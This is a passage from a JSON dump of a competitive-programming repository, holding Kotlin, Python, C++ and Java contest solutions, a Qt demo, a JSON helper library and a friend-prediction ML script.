}\n var trie = Trie()\n ss.forEach { trie += it }\n var init = Matrix(162)\n\n val q = LinkedList<Pair<Int, Int>>()\n val num = HashMap<Pair<Int, Int>, Int>()\n fun get(U: Int, V: Int): Int {\n var u = U\n var v = V\n if (u > v) {\n val t = u\n u = v\n v = t\n }\n val key = Pair(u, v)\n if (!num.containsKey(key)) {\n val value = num.size\n num[key] = value\n q.push(key)\n }\n return num[key]!!\n }\n\n val start = Pair(0, 0)\n q.add(start)\n num[start] = 0\n while (!q.isEmpty()) {\n val (u, v) = q.removeFirst()\n val x = get(u, v)\n for (i in 0..25) {\n val tou = trie.array[u][i]\n val tov = trie.array[v][i]\n if (tou == -1 || tov == -1)\n continue\n init.inc(x, get(tou, tov))\n if (trie.term[tou]) init.inc(x, get(0, tov))\n if (trie.term[tov]) init.inc(x, get(tou, 0))\n if (trie.term[tou] && trie.term[tov]) init.inc(x, get(0, 0))\n }\n }\n\n init = init.xor(m)\n writeln(init.value[0][0])\n// writeln(init.value.map { it.joinToString(\" \") }.joinToString(\"\\n\"))\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n run()\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= 
Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.48329049348831177, "alphanum_fraction": 0.5038560628890991, "avg_line_length": 15.913043022155762, "blob_id": "e8938a0b222b2b61f3acfe90654696c4efe21df7", "content_id": "9e618e90d57a01b93054ee073740ae18eb7e88d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 389, "license_type": "no_license", "max_line_length": 31, "num_lines": 23, "path": "/trains/neerc/neerc.ifmo.ru.train.2016.09.20/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "task = 'elephant'\nf = open(task + '.in', 'r')\ncounts = {}\nn = 0\nfac = [1]\nstrings = f.readlines()\nfor s in strings:\n n += 1\n fac.append(fac[-1] * n)\n s = s[:-1]\n if not s in counts:\n counts[s] = 1\n else:\n counts[s] += 1\n\nans = fac[-1]\nfor x in counts:\n ans = ans // fac[counts[x]]\n\ng = open(task + '.out', 'w')\ng.write(strings[ans % n])\ng.close()\nf.close()\n" }, { "alpha_fraction": 0.34703195095062256, "alphanum_fraction": 0.3942161202430725, "avg_line_length": 28.863636016845703, "blob_id": "7b1145f16c3f4074f04bc544dff0f372a8b3b5a7", "content_id": "ff245f9e2c8b523ff53d1752567a15ea08e5a929", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 657, "license_type": "no_license", "max_line_length": 80, "num_lines": 22, "path": "/CodeForce/0639/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n int n, k, i, j, ans = 0;\n cin >> n >> k;\n 
vector<long long> a(n + 1), suf(n + 1, 0), pref(n + 1, 0);\n for (int q = 0; q <= n; ++q)\n cin >> a[q];\n for (i = 0; ((pref[i] + a[i]) % 2 == 0) && i < n; ++i)\n pref[i + 1] = (pref[i] + a[i]) / 2;\n for (j = n; (abs(suf[j] + a[j]) * 2 < 1000000000000ll) && j > 0; --j)\n suf[j - 1] = (suf[j] + a[j]) * 2;\n for (int q = j; q <= i; ++q)\n if (abs(pref[q] + suf[q]) <= k && ((pref[q] + suf[q] != 0) || (q != n)))\n ans++;\n cout << ans << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4647814929485321, "alphanum_fraction": 0.47814908623695374, "avg_line_length": 35.69811248779297, "blob_id": "30fa31bf15bd4d09b0676797426b081ccf3e7dba", "content_id": "899575fff2d4a005e1b4a1f65e8fee135ff59b0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1945, "license_type": "no_license", "max_line_length": 928, "num_lines": 53, "path": "/CodeForce/0306/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint mn = INF, mx = 0;\nvector<int> a(1001);\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int 
&b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nbool readl(vector<int> &a, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a[i] = x;\n }\n return true;\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int n, m;\n readln(n, m);\n if (n % m == 0)\n {\n int t = n / m;\n for (int i = 0; i < m; i++)\n printf(\"%d%c\", t, i == m - 1 ? '\\n' : ' ');\n return 0;\n }\n int t = n / m;\n int f = n % m;\n for (int i = 0; i < m - f; i++)\n printf(\"%d \", t);\n for (int i = m - f; i < m; i++)\n printf(\"%d%c\", t + 1, i == m - 1 ? '\\n' : ' ');\n return 0;\n}\n" }, { "alpha_fraction": 0.4562469720840454, "alphanum_fraction": 0.4674282968044281, "avg_line_length": 17.14418601989746, "blob_id": "b5344e3b30c3a63b30454648533de771380131df", "content_id": "f65a82053c45c1a5be349bfe0914f9e273f2ef36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4114, "license_type": "no_license", "max_line_length": 75, "num_lines": 215, "path": "/trains/opencupSpb/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\r\nimport java.util.*;\r\nimport java.math.BigInteger;\r\nimport java.util.Map.Entry;\r\n\r\nimport static java.lang.Math.*;\r\n\r\npublic class D extends PrintWriter {\r\n\r\n\tprivate static final String input = null;\r\n\tprivate static final String output = null;\r\n\r\n\tvoid run() {\r\n\t\tint n = nextInt(), m = 1_000_000 + 1;\r\n\r\n\t\tint l = -1, r = -1;\r\n\r\n\t\tint[] d = nextArray(n);\r\n\r\n\t\tint[] p = new int[m];\r\n\t\tfor (int i = 0; i < m; i++) {\r\n\t\t\tp[i] = i;\r\n\t\t}\r\n\r\n\t\tfor (int i = 2; i < m; i++) 
{\r\n\t\t\tif (p[i] == i) {\r\n\t\t\t\tfor (int j = 2 * i; j < m; j += i) {\r\n\t\t\t\t\tp[j] = min(i, p[j]);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tint[] size = new int[m];\r\n\t\tint[][] v = new int[m][];\r\n\r\n\t\tfor (int i = 0; i < n; i++) {\r\n\t\t\tint cur = d[i];\r\n\r\n\t\t\twhile (cur > 1) {\r\n\t\t\t\tint prime = p[cur];\r\n\t\t\t\twhile (cur % prime == 0) {\r\n\t\t\t\t\tcur /= prime;\r\n\t\t\t\t}\r\n\r\n\t\t\t\tv[prime] = set(v[prime], size[prime]++, i);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfor (int i = 0; i < m; i++) {\r\n\t\t\tfinal int k = size[i];\r\n\r\n\t\t\tif (k > 0) {\r\n\t\t\t\tif (k == 1) {\r\n\t\t\t\t\tif (l == r) {\r\n\t\t\t\t\t\tl = r = v[i][0];\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tint[] val = new int[k];\r\n\r\n\t\t\t\t\tfor (int j = 0; j < k; j++) {\r\n\t\t\t\t\t\tval[j] = v[i][j] - 2 * j;\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tint[] min = new int[k];\r\n\r\n\t\t\t\t\tmin[k - 1] = val[k - 1];\r\n\r\n\t\t\t\t\tfor (int j = k - 2; j >= 0; j--) {\r\n\t\t\t\t\t\tmin[j] = min(val[j], min[j + 1]);\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tfor (int j = 0; j < k; j++) {\r\n\t\t\t\t\t\tint x = j, y = k - 1;\r\n\t\t\t\t\t\tint f = val[j] + 1;\r\n\r\n\t\t\t\t\t\twhile (y - x > 1) {\r\n\t\t\t\t\t\t\tint z = (x + y) / 2;\r\n\t\t\t\t\t\t\tif (f <= min[z]) {\r\n\t\t\t\t\t\t\t\ty = z;\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\tx = z;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\ty = max(x - 1, j);\r\n\t\t\t\t\t\twhile ((y + 1) < k && val[y + 1] <= f) {\r\n\t\t\t\t\t\t\t++y;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tx = j;\r\n\r\n\t\t\t\t\t\tint w = val[x] - val[y] + 1;\r\n\t\t\t\t\t\tint fr = v[i][x];\r\n\t\t\t\t\t\tint to = v[i][y];\r\n\r\n\t\t\t\t\t\tint la = min(w, fr);\r\n\t\t\t\t\t\tw -= la;\r\n\t\t\t\t\t\tfr -= la;\r\n\r\n\t\t\t\t\t\tint ra = min(w, n - 1 - to);\r\n\t\t\t\t\t\tw -= ra;\r\n\t\t\t\t\t\tto += ra;\r\n\r\n\t\t\t\t\t\tif (to - fr > r - l) {\r\n\t\t\t\t\t\t\tl = fr;\r\n\t\t\t\t\t\t\tr = 
to;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprintln((l + 1) + \" \" + (r + 1));\r\n\r\n\t}\r\n\r\n\tint[] set(int[] vector, int index, int val) {\r\n\t\tif (vector == null) {\r\n\t\t\tvector = new int[index + 8];\r\n\t\t}\r\n\t\tif (index < vector.length) {\r\n\t\t\tvector[index] = val;\r\n\t\t\treturn vector;\r\n\t\t} else {\r\n\t\t\tint[] victor = Arrays.copyOf(vector, max(index + 1, vector.length * 2));\r\n\t\t\tvictor[index] = val;\r\n\t\t\treturn victor;\r\n\t\t}\r\n\t}\r\n\r\n\tlong gcd(long a, long b) {\r\n\t\treturn b == 0 ? a : gcd(b, a % b);\r\n\t}\r\n\r\n\tint[][] nextMatrix(int n, int m) {\r\n\t\tint[][] matrix = new int[n][m];\r\n\t\tfor (int i = 0; i < n; i++)\r\n\t\t\tfor (int j = 0; j < m; j++)\r\n\t\t\t\tmatrix[i][j] = nextInt();\r\n\t\treturn matrix;\r\n\t}\r\n\r\n\tString next() {\r\n\t\twhile (!tokenizer.hasMoreTokens())\r\n\t\t\ttokenizer = new StringTokenizer(nextLine());\r\n\t\treturn tokenizer.nextToken();\r\n\t}\r\n\r\n\tboolean hasNext() {\r\n\t\twhile (!tokenizer.hasMoreTokens()) {\r\n\t\t\tString line = nextLine();\r\n\t\t\tif (line == null) {\r\n\t\t\t\treturn false;\r\n\t\t\t}\r\n\t\t\ttokenizer = new StringTokenizer(line);\r\n\t\t}\r\n\t\treturn true;\r\n\t}\r\n\r\n\tint[] nextArray(int n) {\r\n\t\tint[] array = new int[n];\r\n\t\tfor (int i = 0; i < n; i++) {\r\n\t\t\tarray[i] = nextInt();\r\n\t\t}\r\n\t\treturn array;\r\n\t}\r\n\r\n\tint nextInt() {\r\n\t\treturn Integer.parseInt(next());\r\n\t}\r\n\r\n\tlong nextLong() {\r\n\t\treturn Long.parseLong(next());\r\n\t}\r\n\r\n\tdouble nextDouble() {\r\n\t\treturn Double.parseDouble(next());\r\n\t}\r\n\r\n\tString nextLine() {\r\n\t\ttry {\r\n\t\t\treturn reader.readLine();\r\n\t\t} catch (IOException err) {\r\n\t\t\treturn null;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic D(OutputStream outputStream) {\r\n\t\tsuper(outputStream);\r\n\t}\r\n\r\n\tstatic BufferedReader reader;\r\n\tstatic StringTokenizer tokenizer = new StringTokenizer(\"\");\r\n\tstatic Random 
rnd = new Random();\r\n\tstatic boolean OJ;\r\n\r\n\tpublic static void main(String[] args) throws IOException {\r\n\t\tD solution;\r\n\t\tif (input == null) {\r\n\t\t\treader = new BufferedReader(new InputStreamReader(System.in));\r\n\t\t} else {\r\n\t\t\treader = new BufferedReader(new FileReader(new File(input)));\r\n\t\t}\r\n\r\n\t\tif (output == null) {\r\n\t\t\tsolution = new D(System.out);\r\n\t\t} else {\r\n\t\t\tsolution = new D(new FileOutputStream(output));\r\n\t\t}\r\n\r\n\t\tsolution.run();\r\n\t\tsolution.close();\r\n\t\treader.close();\r\n\t}\r\n}" }, { "alpha_fraction": 0.620512843132019, "alphanum_fraction": 0.620512843132019, "avg_line_length": 16.636363983154297, "blob_id": "ac1df9f143b9935b83147e86ed3d50383854b1e7", "content_id": "173b2bf9d7569baebe8497d6e80ec33a97deee2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 195, "license_type": "no_license", "max_line_length": 34, "num_lines": 11, "path": "/study/ChatNotDemo/main.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " #include <QApplication>\n\n #include \"chatdialog.h\"\n\n int main(int argc, char *argv[])\n {\n QApplication app(argc, argv);\n ChatDialog dialog;\n dialog.show();\n return app.exec();\n }\n" }, { "alpha_fraction": 0.4528109133243561, "alphanum_fraction": 0.46678024530410767, "avg_line_length": 26.952381134033203, "blob_id": "bbb421e354149ab1665627bcce7f28c774d7e781", "content_id": "6573bcdb39d6cba2e40d788bd0298ad64cebd9ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2935, "license_type": "no_license", "max_line_length": 131, "num_lines": 105, "path": "/CodeForce/1346/F.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n \nfun IntArray.longSum(): Long {\n var sum = 0L\n forEach { sum += it }\n return sum\n}\n\nprivate fun run() {\n 
val (n, m, q) = readln()\n var a = Array(n){ readln() }\n var total = a.map{ it.longSum() }.sum()\n var r = LongArray(n) {0L}\n var c = LongArray(m) {0L}\n for (i in 0..n - 1)\n for (j in 0..m - 1) {\n r[i] = r[i] + a[i][j]\n c[j] = c[j] + a[i][j]\n }\n\n var res = LongArray(q + 1) {0L}\n for (qq in 0..q) {\n var si = 0\n var sj = 0\n var sum = 0L\n var ans = 0L\n while (2 * (sum + r[si]) < total)\n sum += r[si++]\n sum = 0L\n while (2 * (sum + c[sj]) < total)\n sum += c[sj++]\n for (i in 0..n - 1)\n ans += r[i] * Math.abs(i - si)\n for (j in 0..m - 1)\n ans += c[j] * Math.abs(j - sj)\n res[qq] = ans\n if (qq < q) {\n var (i, j, x) = readln(); --i; --j;\n val delta = x - a[i][j]\n total += delta\n r[i] = r[i] + delta\n c[j] = c[j] + delta\n a[i][j] += delta\n }\n }\n writeln(res.joinToString(\" \"))\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n val t = 1\n for (q in 1..t) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) = println(strings.map{if (it is IntArray) it.joinToString(\" \") else it}.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n 
require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.6098137497901917, "alphanum_fraction": 0.6127697229385376, "avg_line_length": 30.324073791503906, "blob_id": "0af24e37bc5c6e3485a8aa3a4c08bffaca44be4f", "content_id": "05f9f8355854bbe6304490283e26d3cbc46e3397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3383, "license_type": "no_license", "max_line_length": 131, "num_lines": 108, "path": "/scripts/library.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nimport random\nimport json\nimport time\nimport os\nimport datetime\n\nimport click\nimport click_completion\nimport click_completion.core\n\nclick_completion.init()\n\[email protected]()\ndef completion():\n pass\n\[email protected]()\[email protected]('--append/--overwrite', help=\"Append the completion code to the file\", default=None)\[email protected]('shell', required=False, type=click_completion.DocumentedChoice(click_completion.core.shells))\[email protected]('path', required=False)\ndef install(append, shell, path):\n shell, path = click_completion.core.install(shell=shell, path=path, append=append)\n click.echo('%s completion installed in %s' % (shell, path))\n\n\nclass dotdict(dict):\n __getattr__ = dict.get\n __setattr__ = dict.__setitem__\n __delattr__ = dict.__delitem__\n def __init__(self, *args, **kwargs):\n super(dotdict, self).__init__(*args, **kwargs)\n for d in args:\n if isinstance(d, dict):\n for key, value in d.items():\n if isinstance(value, dict):\n value = dotdict(value)\n elif isinstance(value, list) and value and isinstance(value[0], dict):\n value = list(map(dotdict, value))\n 
self[key] = value\n\n if kwargs:\n for k, v in kwargs.items():\n self[k] = v\n\ndef decorateFunction(original):\n def decorated(*args, **kwargs):\n value = original(*args, **kwargs)\n return dotdict(value) if isinstance(value, dict) else value\n return decorated\n\ndef unlimited(f, field, max_count, verbose = False, count_field = 'count', offset_field = 'offset', starting_offset = 0, **kwargs):\n kwargs[count_field] = max_count\n if not 'max_iterations' in kwargs:\n max_iterations = -1\n else:\n max_iterations = kwargs['max_iterations']\n\n offset = starting_offset\n res = []\n iterations = 0\n while True:\n iterations += 1\n if verbose:\n print(f'Getting {max_count}, offset {offset}')\n kwargs[offset_field] = offset\n temp = f(**kwargs)\n if not field in temp:\n time.sleep(2)\n continue\n temp = temp[field]\n if not temp: break\n\n res += temp\n offset += max_count\n if max_iterations != -1 and iterations >= max_iterations:\n break\n time.sleep(1 / 3)\n return res\n\njson.loads = decorateFunction(json.loads)\nrequests.Response.json = decorateFunction(requests.Response.json)\n\ndef getFilename(filename):\n if filename.startswith('~'):\n filename = os.path.expanduser('~') + filename[1:]\n if not filename.startswith('.') and not filename.startswith('/'):\n filename = './' + filename\n return filename\n\ndef saveJsonInFile(j, filename):\n if type(filename) == str:\n filename = getFilename(filename)\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n filename = open(filename, 'w')\n filename.write(json.dumps(j, ensure_ascii=False))\n filename.close()\n\ndef loadJsonFromFile(filename):\n if type(filename) == str:\n filename = getFilename(filename)\n if not os.path.exists(filename):\n return None\n filename = open(filename, 'r')\n j = json.loads(''.join(filename.readlines()))\n filename.close()\n return j\n" }, { "alpha_fraction": 0.4754098355770111, "alphanum_fraction": 0.49180328845977783, "avg_line_length": 
11.199999809265137, "blob_id": "cebcd438294a1d824d4962a7a6ae9fdb3bb874f9", "content_id": "10d2c542102ad0a30d36bf90c46682c6d73c8f1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/CodeForce/0952/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\n\ns = re.split('([+|-])', input())\n\nprint(ord('2'))\n" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.5, "avg_line_length": 20, "blob_id": "7bbd5af0f6ad73e0a3542f8bffe7bcf76b2f8fd2", "content_id": "f9810cb516ef9092d300267d7fb8d23c13c4f628", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/CodeForce/0934/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=input()\nprint[-1,n/2*'8'+n%2*'6'][n<37]\n" }, { "alpha_fraction": 0.523809552192688, "alphanum_fraction": 0.5420466065406799, "avg_line_length": 23.370370864868164, "blob_id": "41f2be1f3795edb8489a0900158285639ea4aced", "content_id": "00da5be68b765e7c7fe52db93cc64a2af3bdbb4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1974, "license_type": "no_license", "max_line_length": 65, "num_lines": 81, "path": "/2021/vkcupMl/test.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\nfrom joblib import dump, load\n\nclf = load('filename.joblib2')\nprint(clf.classes_)\n\ntest = './TEST/train.csv'\noutput = './TEST/submit.csv'\n\nfriends = {}\npossible = {}\nanswers = []\n\ndef addFriends(u, v, t):\n if not u in friends:\n friends[u] = {}\n friends[u][v] = t\n\ndef add(u, v, value):\n if value == 0: return\n if not u in possible:\n possible[u] = {}\n if not v in possible[u]:\n possible[u][v] = 0\n possible[u][v] 
+= value\n\nprint('Reading data')\n\nwith open(test, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n addFriends(u, v, t)\n addFriends(v, u, t)\n # if len(friends) > 300000:\n # break\n\nprint('Predicting friends')\n\nX = []\nq = []\nfor w, wsFriends in tqdm(friends.items(), total = len(friends)):\n l = len(wsFriends)\n for u, uw in wsFriends.items():\n if u % 8 != 1: continue\n if (100 - uw[0]) * uw[1] / l < 1: continue\n for v, vw in wsFriends.items():\n if v % 2 == 0 or v <= u or v in friends[u]: continue\n if (100 - vw[0]) * vw[1] / l < 1: continue\n X.append([l, *uw, *vw])\n q.append([u, v])\n friends[w] = []\n\ny = clf.predict_proba(X)\nfor i in tqdm(range(len(y))):\n add(q[i][0], q[i][1], y[i][1])\n\nprint('Generating answers')\nfor u, variants in tqdm(possible.items(), total = len(possible)):\n pos = []\n for v, value in variants.items():\n pos.append((value, v))\n\n if len(pos) > 0:\n if len(pos) > 10:\n pos.sort(reverse = True)\n answers.append((u, list(map(lambda p: p[1], pos[:10]))))\n\nanswers.sort()\n\nprint('Writing answers:', len(answers))\nwith open(output, 'w') as submit:\n for row in tqdm(answers, total = len(answers)):\n submit.write(f'{row[0]}: {\",\".join(map(str, row[1]))}\\n')\n\nprint('DONE')\n" }, { "alpha_fraction": 0.4291611611843109, "alphanum_fraction": 0.44848084449768066, "avg_line_length": 29.280000686645508, "blob_id": "b08d03f2e085b032e45dba84d77f69b81a39e6c0", "content_id": "d43e1cbd204eabc507255e329bd2d0bcfe6a7cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6056, "license_type": "no_license", "max_line_length": 174, "num_lines": 200, "path": "/2021/fbhc2/C2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//sparseTable\n//0-indexed, [l, r)\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T (T, T)> F;\n F f;\n\n int highestBit(int x) const { return 31 - __builtin_clz(x); }\n\n sparseTable() {}\n\n sparseTable(vector<T>& a, F g)\n {\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n));\n fori(n)\n st[0][i] = a[i];\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))]);\n }\n\n T get(int l, int r)\n {\n int len = highestBit(r - l);\n return f(st[len][l], st[len][r - (1 << len)]);\n }\n};\n\n//}}}\n\nvoid run()\n{\n ints(n, m, k, q);\n cerr << n << \" \" << m << \" \" << k << \" \" << q << endl;\n vector<string> s(n);\n readln(s);\n s.insert(s.begin(), string(m, '.'));\n s.pb(string(m, '.'));\n \n ll sum = 0;\n auto ss = [&]() {\n reverse(all(s));\n k = n - k + 1;\n };\n\n vector<vector<vector<int>>> below(2, vector<vector<int>>(n + 2, vector<int>(m, 0)));\n vector<vector<int>> temps(2, vector<int>(n + 2, 0));\n vector<vector<int>> answers(2, vector<int>(n + 2, m));\n\n auto calcBelow = [&](int order) {\n FOR(i, k + 1, s.size())\n forj(m)\n below[order][k + 1][j] += s[i][j] == 'X';\n ROF(i, k, 0)\n {\n temps[order][i] = k - i;\n forj(m)\n {\n below[order][i][j] = below[order][i + 1][j];\n if (s[i][j] == 'X')\n temps[order][i]++,\n below[order][i][j]++;\n else\n temps[order][i] += below[order][i][j] >= (n - k + 1);\n }\n answers[order][i] = min(answers[order][i + 1], temps[order][i]);\n }\n ss();\n };\n\n calcBelow(0);\n calcBelow(1);\n\n auto get = [&](int r, int c) {\n int fill = s[r][c] == '.' ? 
